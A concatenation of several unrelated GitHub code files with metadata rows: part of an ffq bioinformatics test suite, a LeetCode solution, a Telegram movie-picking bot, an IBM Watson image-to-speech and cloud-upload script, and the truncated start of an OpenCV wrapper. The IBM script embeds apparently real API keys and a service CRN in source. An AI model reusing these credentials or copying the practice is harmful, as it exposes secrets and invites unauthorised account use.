"url": "ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR642/003/SRR6425163/SRR6425163_1.fastq.gz",
"urltype": "ftp",
},
{
"accession": "SRR6425163",
"filename": "SRR6425163_2.fastq.gz",
"filenumber": 2,
"filesize": 22946392178,
"filetype": "fastq",
"md5": "1d0703967a2331527a3aebf97a3f1c32",
"url": "ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR642/003/SRR6425163/SRR6425163_2.fastq.gz",
"urltype": "ftp",
},
],
"gcp": [
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R1_001.fastq.gz",
"filenumber": 1,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "gs://sra-pub-src-6/SRR6425163/J2_S1_L001_R1_001.fastq.gz",
"urltype": "gcp",
},
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R2_001.fastq.gz",
"filenumber": 2,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "gs://sra-pub-src-6/SRR6425163/J2_S1_L001_R2_001.fastq.gz",
"urltype": "gcp",
},
{
"accession": "SRR6425163",
"filename": "SRR6425163.1",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "gs://sra-pub-crun-7/SRR6425163/SRR6425163.1",
"urltype": "gcp",
},
],
"ncbi": [],
},
"sample": "SRS2792433",
"study": "SRP127624",
"title": "HiSeq X Ten paired end sequencing; GSM2905292: BMPa-1; Homo sapiens; RNA-Seq",
}
},
"title": "HiSeq X Ten paired end sequencing; GSM2905292: BMPa-1; Homo sapiens; RNA-Seq",
},
ffq.parse_experiment_with_run(soup, 10),
)
def test_parse_study(self):
with open(self.study_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.assertEqual(
{
"accession": "SRP178136",
"title": "Multi-modal analysis of the aging mouse lung at cellular resolution",
"abstract": "A) Whole lung tissue from 24 months (n=7) "
"and 3 months old (n=8) mice was dissociated and single-cell "
"mRNAseq libraries generated with Drop-Seq. B) Bulk RNA-seq "
"data was generated from whole mouse lung tissue of old (n=3) "
"and young (n=3) samples. C) Bulk RNA-seq data was generated "
"from flow-sorted macrophages from old (n=7) and young (n=5) "
"mice and flow-sorted epithelial cells from old (n=4) and "
"young (n=4) mice. Overall design: Integration of bulk RNA-seq "
"from whole mouse lung tissue and bulk RNA-seq from flow-sorted "
"lung macrophages and epithelial cells was used to validate results "
"obtained from single cell RNA-seq of whole lung tissue.",
"accession": "SRP178136",
},
ffq.parse_study(soup),
)
def test_gse_search_json(self):
with open(self.gse_search_path, "r") as f:
soup = BeautifulSoup(f.read(), "html.parser")
self.assertEqual(
{"accession": "GSE93374", "geo_id": "200093374"},
ffq.parse_gse_search(soup),
)
def test_gse_summary_json(self):
with open(self.gse_summary_path, "r") as f:
soup = BeautifulSoup(f.read(), "html.parser")
self.assertEqual({"accession": "SRP096361"}, ffq.parse_gse_summary(soup))
def test_ffq_gse(self):
# Need to figure out how to add for loop test for adding individual runs
with mock.patch(
"ffq.ffq.get_gse_search_json"
) as get_gse_search_json, mock.patch(
"ffq.ffq.parse_gse_search"
) as parse_gse_search, mock.patch(
"ffq.ffq.gse_to_gsms"
) as gse_to_gsms, mock.patch(
"ffq.ffq.ffq_gsm"
) as ffq_gsm, mock.patch(
"ffq.ffq.geo_to_suppl"
) as geo_to_suppl:
parse_gse_search.return_value = {"accession": "GSE1", "geo_id": "GEOID1"}
gse_to_gsms.return_value = ["GSM_1", "GSM_2"]
geo_to_suppl.return_value = {
"filename": "file",
"size": "size",
"url": "url",
}
ffq_gsm.side_effect = [
{"accession": "GSM1"},
{"accession": "GSM2"},
"test",
"test",
]
self.assertEqual(
{
"accession": "GSE1",
"supplementary_files": {
"filename": "file",
"size": "size",
"url": "url",
},
"geo_samples": {
"GSM1": {"accession": "GSM1"},
"GSM2": {"accession": "GSM2"},
},
},
ffq.ffq_gse("GSE1"),
)
get_gse_search_json.assert_called_once_with("GSE1")
gse_to_gsms.assert_called_once_with("GSE1")
ffq_gsm.assert_has_calls([call("GSM_1", None), call("GSM_2", None)])
def test_ffq_gsm(self):
# Need to figure out how to add for loop test for adding individual runs
with mock.patch(
"ffq.ffq.get_gsm_search_json"
) as get_gsm_search_json, mock.patch(
"ffq.ffq.geo_to_suppl"
) as geo_to_suppl, mock.patch(
"ffq.ffq.gsm_to_platform"
) as gsm_to_platform, mock.patch(
"ffq.ffq.gsm_id_to_srs"
) as gsm_id_to_srs, mock.patch(
"ffq.ffq.ffq_sample"
) as ffq_sample:
get_gsm_search_json.return_value = {"accession": "GSM1", "geo_id": "GSMID1"}
geo_to_suppl.return_value = {"supplementary_files": "supp"}
gsm_to_platform.return_value = {"platform": "platform"}
gsm_id_to_srs.return_value = "SRS1"
ffq_sample.return_value = {"accession": "SRS1"}
self.assertEqual(
{
"accession": "GSM1",
"supplementary_files": {"supplementary_files": "supp"},
"platform": "platform",
"samples": {"SRS1": {"accession": "SRS1"}},
},
ffq.ffq_gsm("GSM1"),
)
get_gsm_search_json.assert_called_once_with("GSM1")
geo_to_suppl.assert_called_once_with("GSM1", "GSM")
gsm_to_platform.assert_called_once_with("GSM1")
gsm_id_to_srs.assert_called_once_with("GSMID1")
ffq_sample.assert_called_once_with("SRS1", None)
def test_ffq_run(self):
with mock.patch("ffq.ffq.get_xml") as get_xml, mock.patch(
"ffq.ffq.parse_run"
) as parse_run:
run = mock.MagicMock()
parse_run.return_value = run
self.assertEqual(run, ffq.ffq_run("SRR8426358"))
get_xml.assert_called_once_with("SRR8426358")
def test_ffq_study(self):
with mock.patch("ffq.ffq.get_xml") as get_xml, mock.patch(
"ffq.ffq.parse_study"
) as parse_study, mock.patch("ffq.ffq.ffq_sample") as ffq_sample, mock.patch(
"ffq.ffq.get_samples_from_study"
) as get_samples_from_study:
parse_study.return_value = {"study": "study_id"}
get_samples_from_study.return_value = ["sample_id1", "sample_id2"]
ffq_sample.side_effect = [{"accession": "id1"}, {"accession": "id2"}]
self.assertEqual(
{
"study": "study_id",
"samples": {
"id1": {"accession": "id1"},
"id2": {"accession": "id2"},
},
},
ffq.ffq_study("SRP226764"),
)
get_xml.assert_called_once_with("SRP226764")
self.assertEqual(2, ffq_sample.call_count)
ffq_sample.assert_has_calls(
[call("sample_id1", None), call("sample_id2", None)]
)
def test_ffq_experiment(self):
with mock.patch("ffq.ffq.get_xml") as get_xml, mock.patch(
"ffq.ffq.parse_experiment_with_run"
) as parse_experiment_with_run:
parse_experiment_with_run.return_value = {
"experiments": "experiment",
"runs": {"run": "run"},
}
self.assertEqual(
{"experiments": "experiment", "runs": {"run": "run"}},
ffq.ffq_experiment("SRX7048194"),
)
get_xml.assert_called_once_with("SRX7048194")
# Do one per accession, simply asserting equal to the expected list of links.
# def test_ffq_links_gse_ftp(self):
# self.maxDiff = None
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('GSE', 'GSE112570')], 'ftp')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# (
# 'accession\tfiletype\tfilenumber\tlink\n'
# 'GSM3073088\t\tbam\t1\tftp://ftp.sra.ebi.ac.uk/vol1/SRA678/SRA678017/bam/H17w_K1.bam\n' # noqa
# 'GSM3073089\t\tbam\t1\tftp://ftp.sra.ebi.ac.uk/vol1/SRA678/SRA678017/bam/H17w_K2.bam\n' # noqa
# )
# )
# def test_ffq_links_srs_ftp(self):
# capturedOutput = io.StringIO() # Create StringIO object
# sys.stdout = capturedOutput # and redirect stdout.
# ffq.ffq_links([('SRS', 'SRS4629239')], 'ftp') # Call function.
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR890/000/SRR8903510/SRR8903510.fastq.gz '
# )
# def test_ffq_links_gsm_aws(self):
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('GSM', 'GSM3396164')], 'AWS')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'https://sra-pub-src-1.s3.amazonaws.com/SRR7881402/possorted_genome_bam_Ck.bam.1 '
# )
# def test_ffq_links_srr_gcp(self):
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('SRR', 'SRR8327928')], 'GCP')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'gs://sra-pub-src-1/SRR8327928/PDX110_possorted_genome_bam.bam.1 '
# )
# def test_ffq_links_srx_ncbi(self):
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('SRX', 'SRX4063411')], 'NCBI')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'https://sra-downloadb.be-md.ncbi.nlm.nih.gov/sos2/sra-pub-run-13/SRR7142647/SRR7142647.1 '
# )
def test_ffq_doi(self):
with mock.patch("ffq.ffq.get_doi") as get_doi, mock.patch(
"ffq.ffq.search_ena_title"
) as search_ena_title, mock.patch("ffq.ffq.ffq_study") as ffq_study:
get_doi.return_value = {"title": ["title"]}
search_ena_title.return_value = ["SRP1"]
self.assertEqual([ffq_study.return_value], ffq.ffq_doi("doi"))
get_doi.assert_called_once_with("doi")
search_ena_title.assert_called_once_with("title")
ffq_study.assert_called_once_with("SRP1", None)
def test_ffq_doi_no_title(self):
with mock.patch("ffq.ffq.get_doi") as get_doi, mock.patch(
"ffq.ffq.search_ena_title"
) as search_ena_title, mock.patch(
"ffq.ffq.ncbi_search"
) as ncbi_search, mock.patch(
"ffq.ffq.ncbi_link"
) as ncbi_link, mock.patch(
"ffq.ffq.geo_ids_to_gses"
) as geo_ids_to_gses, mock.patch(
"ffq.ffq.ffq_gse"
) as ffq_gse:
get_doi.return_value = {"title": ["title"]}
search_ena_title.return_value = []
ncbi_search.return_value = ["PMID1"]
ncbi_link.return_value = ["GEOID1"]
geo_ids_to_gses.return_value = ["GSE1"]
self.assertEqual([ffq_gse.return_value], ffq.ffq_doi("doi"))
get_doi.assert_called_once_with("doi")
search_ena_title.assert_called_once_with("title")
ncbi_search.assert_called_once_with("pubmed", "doi")
ncbi_link.assert_called_once_with("pubmed", "gds", "PMID1")
geo_ids_to_gses.assert_called_once_with(["GEOID1"])
ffq_gse.assert_called_once_with("GSE1")
    def test_ffq_doi_no_geo(self):
        """ffq_doi: when neither ENA nor GEO yields results, fall back to the
        pubmed -> SRA route and group the found runs under their study."""
        with mock.patch("ffq.ffq.get_doi") as get_doi, mock.patch(
            "ffq.ffq.search_ena_title"
        ) as search_ena_title, mock.patch(
            "ffq.ffq.ncbi_search"
        ) as ncbi_search, mock.patch(
            "ffq.ffq.ncbi_link"
        ) as ncbi_link, mock.patch(
            "ffq.ffq.sra_ids_to_srrs"
        ) as sra_ids_to_srrs, mock.patch(
            "ffq.ffq.ffq_run"
        ) as ffq_run:
            get_doi.return_value = {"title": ["title"]}
            search_ena_title.return_value = []
            ncbi_search.return_value = ["PMID1"]
            # First link call (gds) returns nothing; second (sra) succeeds.
            ncbi_link.side_effect = [[], ["SRA1"]]
            sra_ids_to_srrs.return_value = ["SRR1"]
            ffq_run.return_value = {"accession": "SRR1", "study": {"accession": "SRP1"}}
            # Runs are regrouped under their parent study accession.
            self.assertEqual(
                [
                    {
                        "accession": "SRP1",
                        "runs": {
                            "SRR1": {
                                "accession": "SRR1",
                                "study": {"accession": "SRP1"},
                            }
                        },
                    }
                ],
                ffq.ffq_doi("doi"),
            )
            get_doi.assert_called_once_with("doi")
            search_ena_title.assert_called_once_with("title")
            ncbi_search.assert_called_once_with("pubmed", "doi")
            self.assertEqual(2, ncbi_link.call_count)
            ncbi_link.assert_has_calls(
                [
                    call("pubmed", "gds", "PMID1"),
                    call("pubmed", "sra", "PMID1"),
                ]
            )
            sra_ids_to_srrs.assert_called_once_with(["SRA1"])
            ffq_run.assert_called_once_with("SRR1")
def test_version_string(self):
with patch("sys.argv", ["main", "--version"]):
out = StringIO()
sys.stdout = out
try:
main()
except SystemExit:
pass
output = out.getvalue()
self.assertEqual(output, f"main {__version__}\n")
def test_split_output(self):
# test the functionality of --split ensuring the output file is created
# and is a valid ffq json file
import tempfile
import json
import os
tempdir = tempfile.mkdtemp()
with patch("sys.argv", ["main", "--split", "-o", tempdir, "SRR1581006"]):
out = StringIO()
sys.stdout = out
try:
main()
except SystemExit:
pass
output = out.getvalue()
# Test that the STDOUT is empty (an not "null")
self.assertEqual(output, "")
# Test the output JSON file
file_json = json.load(open(os.path.join(tempdir, "SRR1581006.json")))
self.assertEqual(file_json["accession"], "SRR1581006")
| pachterlab/ffq | tests/test_ffq.py | test_ffq.py | py | 28,319 | python | en | code | 494 | github-code | 36 |
38045628445 | class Solution:
def findTheWinner(self, n: int, k: int) -> int:
stack = [i for i in range(n)]
start = 0
while len(stack)>1:
popped = (start+k-1)%len(stack)
stack.pop(popped)
start=popped
return stack[0]+1 | Navaneethp007/MissionImpossible | LeetCode/Find the Winner of the Circular Game.py | Find the Winner of the Circular Game.py | py | 334 | python | en | code | 10 | github-code | 36 |
12741468324 | from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, ParseMode
from telegram.ext import ConversationHandler
import random
def anketa_random_start(update, context):
    """Entry point of the random-movie flow: show the 'get a movie' button.

    Returns the next conversation state name ('anketa_random_result').
    """
    update.message.reply_text(
        f'Вы выбрали случайный фильм. Нажмите на кнопку "Получить фильм" и подождите немного, пока его подберу',
        reply_markup=ReplyKeyboardMarkup(
            [["Получить фильм"]],
            one_time_keyboard=True,
            resize_keyboard=True
        )
    )
    return 'anketa_random_result'
movies_list = ['Красотка','Зеленая миля','Бетмен: начало','Форрест Гамп','Перл Харбор','Храброе сердце','Девчата']
def anketa_random_result(update, context):
    """Send a random movie from the pool and remove it from further picks.

    Returns the next conversation state name ('final_random').
    """
    # random.choice is the idiomatic equivalent of indexing with randint.
    random_movie = random.choice(movies_list)
    update.message.reply_text(
        f'Ваш случайный фильм: {random_movie}. \nМожете попросить меня подобрать другой случайный фильм',
        reply_markup=ReplyKeyboardMarkup([['Подобрать другой случайный фильм', 'Я нашел нужный фильм']],
                                         one_time_keyboard=True,
                                         resize_keyboard=True
                                         )
    )
    # Never suggest the same movie twice (module-level pool is mutated).
    movies_list.remove(random_movie)
    return 'final_random'
def other_random(update, context):
    """Offer another random movie, or end the conversation when the pool is empty.

    Returns 'final_random' while movies remain, otherwise ConversationHandler.END.
    """
    if movies_list:
        # random.choice is the idiomatic equivalent of indexing with randint;
        # the empty pool is handled by the branch below.
        other_random_movie = random.choice(movies_list)
        update.message.reply_text(
            f'Ваш следующий рандомный фильм: {other_random_movie}',
            reply_markup=ReplyKeyboardMarkup([['Подобрать другой случайный фильм', 'Я нашел нужный фильм']],
                                             one_time_keyboard=True,
                                             resize_keyboard=True
                                             )
        )
        movies_list.remove(other_random_movie)
        return 'final_random'
    else:
        update.message.reply_text(
            f'У меня закончились фильмы, вы маньяк', reply_markup=ReplyKeyboardMarkup([['Вернуться в начало']],
                                                                                      one_time_keyboard=True,
                                                                                      resize_keyboard=True
                                                                                      )
        )
        return ConversationHandler.END
def final_random(update, context):
    """Close the random-movie conversation with a farewell message."""
    back_to_start_keyboard = ReplyKeyboardMarkup(
        [['Вернуться в начало']],
        one_time_keyboard=True,
        resize_keyboard=True,
    )
    update.message.reply_text('Рад был помочь!', reply_markup=back_to_start_keyboard)
    return ConversationHandler.END
def anketa_dontknow_random(update, context):
    """Fallback handler for unrecognized input within the random-movie flow."""
    update.message.reply_text('Я вас не понимаю')
| bezrezen/kino_bot | anketa_random.py | anketa_random.py | py | 2,846 | python | ru | code | 1 | github-code | 36 |
36374178276 | from ibm_watson import TextToSpeechV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from playsound import playsound
import json
from watson_developer_cloud import VisualRecognitionV3
import json
import ibm_boto3
from ibm_botocore.client import Config, ClientError
# SECURITY (review): all API keys and the service CRN below are hard-coded
# in source. They should be moved to environment variables / a config file,
# and the exposed credentials rotated.
visual_recognition = VisualRecognitionV3(
    '2018-03-19',
    iam_apikey='9txnOj7i6F1b8kxKdiIO96GYI7V_xxjE3v34uB_a1ERp')
authenticator = IAMAuthenticator('ZmfQSpS-m85wNBln69v_ojQDkFIlhJMIrQP3w5Y3hegP')
text_to_speech = TextToSpeechV1(
    authenticator=authenticator
)
text_to_speech.set_service_url('https://api.au-syd.text-to-speech.watson.cloud.ibm.com/instances/3e6111c0-3fec-4fe0-92d2-61e9250fc06b')
# Classify the local image with the 'food' classifier (confidence >= 0.6).
with open('./food.jpg', 'rb') as image_file:
    classes = visual_recognition.classify(
        image_file,
        threshold='0.6',
        classifier_ids='food').get_result()
    print(json.dumps(classes, indent=2))
# Round-trip through json only to get a plain dict view of the result.
speak=json.loads(json.dumps(classes))
x=speak['images']
# For every recognized class label: synthesize it to speech and play it.
# Note: 'task.mp3' is overwritten on each iteration.
for i in x:
    for j in i['classifiers']:
        k=j['classes']
        for l in k:
            m=l['class']
            print(m)
            with open('task.mp3', 'wb') as audio_file:
                audio_file.write(
                    text_to_speech.synthesize(
                        m,
                        voice='en-US_AllisonVoice',
                        accept='audio/mp3'
                    ).get_result().content)
            playsound('task.mp3')
# Constants for IBM COS values
COS_ENDPOINT = "https://s3.jp-tok.cloud-object-storage.appdomain.cloud" # Current list avaiable at https://control.cloud-object-storage.cloud.ibm.com/v2/endpoints
COS_API_KEY_ID = "Rz4Bn5WfJ3NHLyoF3rQesiKjG6lXo-k8vnVBm3-rm_2z" # eg "W00YiRnLW4a3fTjMB-odB-2ySfTrFBIQQWanc--P3byk"
COS_AUTH_ENDPOINT = "https://iam.cloud.ibm.com/identity/token"
COS_RESOURCE_CRN = "crn:v1:bluemix:public:cloud-object-storage:global:a/d27055cdf70a4c8a82a0891135504b4c:be3efa61-d84f-4161-b654-255da6f7b06f::" # eg "crn:v1:bluemix:public:cloud-object-storage:global:a/3bf0d9003abfb5d29761c3e97696b71c:d6f04d83-6c4f-4a62-a165-696756d63903::"
# Create resource
cos = ibm_boto3.resource("s3",
    ibm_api_key_id=COS_API_KEY_ID,
    ibm_service_instance_id=COS_RESOURCE_CRN,
    ibm_auth_endpoint=COS_AUTH_ENDPOINT,
    config=Config(signature_version="oauth"),
    endpoint_url=COS_ENDPOINT
)
def multi_part_upload(bucket_name, item_name, file_path):
    """Upload a local file to IBM Cloud Object Storage as `item_name`.

    Files larger than 15 MB are uploaded in 5 MB parts. Errors are printed
    (best effort) rather than raised.
    """
    try:
        print("Starting file transfer for {0} to bucket: {1}\n".format(item_name, bucket_name))
        # set 5 MB chunks
        part_size = 1024 * 1024 * 5
        # set threshold to 15 MB
        file_threshold = 1024 * 1024 * 15
        # set the transfer threshold and chunk size
        transfer_config = ibm_boto3.s3.transfer.TransferConfig(
            multipart_threshold=file_threshold,
            multipart_chunksize=part_size
        )
        # the upload_fileobj method will automatically execute a multi-part upload
        # in 5 MB chunks for all files over 15 MB
        with open(file_path, "rb") as file_data:
            cos.Object(bucket_name, item_name).upload_fileobj(
                Fileobj=file_data,
                Config=transfer_config
            )
        print("Transfer for {0} Complete!\n".format(item_name))
    except ClientError as be:
        print("CLIENT ERROR: {0}\n".format(be))
    except Exception as e:
        print("Unable to complete multi-part upload: {0}".format(e))
multi_part_upload("mohammadansari2", "ansari.mp3", "task.mp3")
| Ansari369/IoT-projects | taskapp.py | taskapp.py | py | 3,478 | python | en | code | 0 | github-code | 36 |
541817983 | class Map:
x = 0
y = 0
map = []
    def __init__(self):
        """Build the map interactively (prompts on stdin) and print it."""
        self.create_map()
        self.show_map()
def create_map(self):
self.x = int(input('Введите ширину карты'))
self.y = int(input('Введите длину карты'))
for i in range(0, self.x):
self.map.append([])
for j in range(0, self.y):
self.map[i].append(0)
def show_map(self):
st = ''
for i in self.map:
for j in i:
st += str(j) + ' '
else:
print(st)
st = ''
| gruzchik17/game | map.py | map.py | py | 649 | python | en | code | 1 | github-code | 36 |
72447111784 | from base64 import b64decode
import invoicegen.settings
import settings.helper
from django.contrib.auth.decorators import login_required, permission_required
from django.core.files.base import ContentFile
from django.http import JsonResponse
from django.views import View
from django.shortcuts import *
from django.utils import timezone
from django.utils.crypto import get_random_string
from django_tables2 import RequestConfig
from .tables import AgreementTable, AgreementTextTable
from .helper import replace_text
from .forms import AgreementForm, AgreementTextForm
from .models import *
@login_required
@permission_required('agreements.view_agreement')
def agreement_index(request):
    """List all agreements in a sortable, paginated django-tables2 table."""
    agreements = AgreementTable(Agreement.objects.all())
    RequestConfig(request).configure(agreements)
    return render(request, 'agreements/agreements.html', {'agreements': agreements})
@login_required
@permission_required('agreements.view_agreementtext')
def agreementtext_index(request):
    """List all model agreement texts in a sortable, paginated table."""
    model_agreements = AgreementTextTable(AgreementText.objects.all())
    RequestConfig(request).configure(model_agreements)
    return render(request, 'agreements/agreementtext/agreementtext_index.html',
                  {'model_agreements': model_agreements})
class AddAgreement(View):
    """Step one of creating an agreement: base data (company, articles)."""
    def post(self, request):
        """Validate and save the new agreement, then go to step two."""
        agreement = Agreement()
        agreement_form = AgreementForm(request.POST, instance=agreement)
        if agreement_form.is_valid():
            data = agreement_form.cleaned_data
            agreement_form.save(commit=False)
            agreement.created = timezone.now()
            # Random token used as the public (unauthenticated) signing URL.
            agreement.url = get_random_string(length=32)
            agreement.company = data['company']
            agreement.save()
            # M2M can only be set after the instance has a primary key.
            for article in data['article_concerned']:
                agreement.article_concerned.add(article)
            agreement.save()
            request.session['toast'] = 'Overeenkomst toegevoegd'
            return redirect(reverse('new_agreement_step_two', kwargs={'agreement_id': agreement.id}))
        else:
            return render(request, 'agreements/new_edit_agreement.html',
                          {'toast': 'Formulier onjuist ingevuld', 'form': agreement_form})
    def get(self, request):
        """Render the empty agreement form with the not-yet-done products."""
        form = AgreementForm()
        articles = Product.objects.filter(done=False)
        return render(request, 'agreements/new_edit_agreement.html', {'form': form, 'articles': articles})
class AddAgreementStepTwo(View):
    """Step two: fill in template variables and render the agreement text."""
    def post(self, request, agreement_id):
        """Collect posted variable values and build the final agreement text."""
        agreement = Agreement.objects.get(id=agreement_id)
        variables = self.agreement_variables(agreement_id)
        key_value_list = {}
        # Form fields are named "variable<id>" per template variable.
        for variable in variables.all():
            post_name = 'variable' + str(variable.id)
            value = request.POST[post_name]
            if variable.name:
                key_value_list[variable.name] = value
        # Freeze the rendered text on the agreement itself so later edits to
        # the template do not change already-created agreements.
        agreement.agreement_text_copy = replace_text(agreement.agreement_text.text, agreement.article_concerned.all(),
                                                     agreement.company, key_value_list)
        agreement.save()
        request.session['toast'] = 'Overeenkomst toegevoegd'
        return redirect(reverse('agreement_index'))
    def get(self, request, agreement_id):
        """Render the variable-entry form for the agreement's template."""
        variables = self.agreement_variables(agreement_id)
        return render(request, 'agreements/new_agreement_step_two.html', {'variables': variables, 'agreement_id': agreement_id})
    def agreement_variables(self, agreement_id):
        """Return the template-variable queryset for the given agreement."""
        agreement = Agreement.objects.get(id=agreement_id)
        variables = agreement.agreement_text.variables
        return variables
def view_agreement(request, url):
    """Public view/sign page for an agreement, looked up by its URL token.

    complete_url/full_name are set on the in-memory object only (not saved);
    they exist purely for the template.
    NOTE(review): non-GET requests fall through and return None — confirm
    this is intentional.
    """
    agreement = Agreement.objects.get(url=url)
    agreement.complete_url = 'https://' + invoicegen.settings.ALLOWED_HOSTS[
        0] + '/overeenkomsten/ondertekenen/' + agreement.url
    agreement.full_name = settings.helper.get_user_fullname()
    if request.method == 'GET':
        return render(request, 'agreements/view_sign_agreement.html', {'agreement': agreement})
@login_required
@permission_required('agreements.change_agreement')
def sign_agreement_contractor(request, url):
    """Store the contractor's signature for the agreement with this URL token.

    Expects POST fields:
        signature: data URL ("data:image/png;base64,...") of the drawn signature.
        signee_name: name of the signing person.

    Returns JSON {'success': True} on success, {'error': ...} when a field is
    missing or blank. Non-POST requests return None, as before.
    """
    agreement = Agreement.objects.get(url=url)
    if request.method == 'POST':
        signature = request.POST.get('signature', '')
        signee_name = request.POST.get('signee_name', '')
        # Bug fix: the original validated 'signee_name' twice and never
        # checked that the signature payload itself was non-empty.
        if signature.strip() and signee_name.strip():
            # The base64 payload follows the first comma of the data URL.
            image_data = b64decode(signature.split(',')[1])
            now = timezone.now()
            file_name = 'signature-of-' + signee_name + '-at-' + str(now) + '.png'
            agreement.signature_file_contractor = ContentFile(image_data, file_name)
            agreement.signed_by_contractor_at = now
            agreement.signed_by_contractor = True
            agreement.save()
            # NOTE(review): complete_url is set on the in-memory object only
            # (after save, not persisted) — behavior preserved from original.
            agreement.complete_url = 'https://' + invoicegen.settings.ALLOWED_HOSTS[
                0] + '/overeenkomsten/ondertekenen/' + agreement.url
            return JsonResponse({'success': True})
        else:
            return JsonResponse({'error': 'Naam of handtekening ontbreekt'})
def sign_agreement_client(request, url):
    """Store the client's signature for the agreement with this URL token.

    Public endpoint (no login): the unguessable URL token is the access
    control. Same contract as sign_agreement_contractor: expects POST fields
    'signature' (data URL) and 'signee_name'; returns a JSON status.
    """
    agreement = Agreement.objects.get(url=url)
    if request.method == 'POST':
        signature = request.POST.get('signature', '')
        signee_name = request.POST.get('signee_name', '')
        # Bug fix: the original validated 'signee_name' twice and never
        # checked that the signature payload itself was non-empty.
        if signature.strip() and signee_name.strip():
            # The base64 payload follows the first comma of the data URL.
            image_data = b64decode(signature.split(',')[1])
            now = timezone.now()
            file_name = 'signature-of-' + signee_name + '-at-' + str(now) + '.png'
            agreement.signature_file_client = ContentFile(image_data, file_name)
            agreement.signed_by_client_at = now
            agreement.signed_by_client = True
            agreement.save()
            return JsonResponse({'success': True})
        else:
            return JsonResponse({'error': 'Naam of handtekening ontbreekt'})
def send_push_notification_signed_agreement():
    # TODO(review): placeholder — no notification is implemented yet.
    pass
@login_required
@permission_required('agreements.delete_agreement')
def delete_agreement(request, agreement_id=-1):
    """Delete the agreement with the given id and redirect to the index.

    The outcome is reported through a session toast; lookup/delete failures
    are reported instead of raised.
    """
    try:
        agreement_to_delete = Agreement.objects.get(id=agreement_id)
        agreement_to_delete.delete()
        request.session['toast'] = 'Overeenkomst verwijderd'
    except Exception:
        # Bug fix: was a bare `except:`, which also swallowed SystemExit
        # and KeyboardInterrupt.
        request.session['toast'] = 'Verwijderen mislukt'
    return redirect(reverse('agreement_index'))
@login_required
@permission_required('agreements.delete_agreementtext')
def delete_model_agreement(request, model_agreement_text_id=-1):
    """Delete the model agreement text with the given id and redirect.

    The outcome is reported through a session toast; lookup/delete failures
    are reported instead of raised.
    """
    try:
        agreement_text_to_delete = AgreementText.objects.get(id=model_agreement_text_id)
        agreement_text_to_delete.delete()
        request.session['toast'] = 'Modelvereenkomst verwijderd'
    except Exception:
        # Bug fix: was a bare `except:`, which also swallowed SystemExit
        # and KeyboardInterrupt.
        request.session['toast'] = 'Verwijderen mislukt'
    return redirect(reverse('agreementtext_index'))
class EditAgreementText(View):
    """Edit an existing model agreement text (template)."""
    def post(self, request, model_agreement_id):
        """Validate and save the edited template plus any new variables."""
        agreementtext = AgreementText.objects.get(id=model_agreement_id)
        form = AgreementTextForm(request.POST, instance=agreementtext)
        if form.is_valid():
            form.save()
            # Dynamically added var_nameN/descN pairs become new variables.
            variable_list = get_extra_variables(request)
            agreementtext.variables.add(*variable_list)
            agreementtext.save()
            return redirect(reverse('agreementtext_index'))
        else:
            return render(request, 'agreements/agreementtext/edit_agreementtext.html',
                          {'form': form, 'edit': True, 'error': form.errors,
                           'model_agreement_id': agreementtext.id})
    def get(self, request, model_agreement_id):
        """Render the edit form pre-filled with the existing template."""
        model_agreement = AgreementText.objects.get(id=model_agreement_id)
        form = AgreementTextForm(instance=model_agreement)
        return render(request, 'agreements/agreementtext/edit_agreementtext.html',
                      {'form': form, 'model_agreement_id': model_agreement.id})
class AddAgreementText(View):
    """Create a new model agreement text (template)."""
    def post(self, request):
        """Validate and save the new template plus its extra variables."""
        agree_text = AgreementText()
        agree_text_form = AgreementTextForm(request.POST, instance=agree_text)
        if agree_text_form.is_valid():
            agree_text_form.save(commit=False)
            agree_text.edited_at = timezone.now()
            agree_text.save()
            # Dynamically added var_nameN/descN pairs become new variables.
            variable_list = get_extra_variables(request)
            agree_text.variables.add(*variable_list)
            agree_text.save()
            request.session['toast'] = 'Modelovereenkomst toegevoegd'
            return redirect(reverse('agreementtext_index'))
        else:
            return render(request, 'agreements/agreementtext/new_agreementtext.html',
                          {'toast': 'Formulier onjuist ingevuld', 'form': agree_text_form,
                           'error': agree_text_form.errors})
    def get(self, request):
        """Render the empty template form."""
        form = AgreementTextForm()
        return render(request, 'agreements/agreementtext/new_agreementtext.html', {'form': form})
def get_extra_variables(request):
    """Collect the dynamically added (var_nameN, descN) pairs from the POST
    data, persist each as an AgreementTextVariable and return them as a list.

    Returns an empty list when no (or only a blank) first variable name is
    posted.
    """
    variable_list = []
    counter = 1
    while True:
        name = request.POST.get('var_name' + str(counter), '')
        # Bug fix: stop at the first missing OR blank name. The original only
        # checked var_name1 for emptiness, so blank names later in the series
        # were stored as variables with empty names.
        if not name:
            break
        desc = request.POST['desc' + str(counter)]
        variable = AgreementTextVariable(name=name, description=desc)
        variable.save()
        variable_list.append(variable)
        counter += 1
    return variable_list
return [] | jlmdegoede/Invoicegen | agreements/views.py | views.py | py | 9,931 | python | en | code | 0 | github-code | 36 |
42246125387 | """
Module with class that wraps OpenCV based detectors and descriptors.
Allows performing Non-Maximum suppression based on keypoints response, top-response keypoints filtering,
descriptors normalization.
"""
from typing import Union, Iterable, Tuple, Optional
import cv2
import numpy as np
from scipy.spatial import KDTree
class OpenCVFeatures:
    def __init__(self, features: cv2.Feature2D, max_keypoints: int = -1,
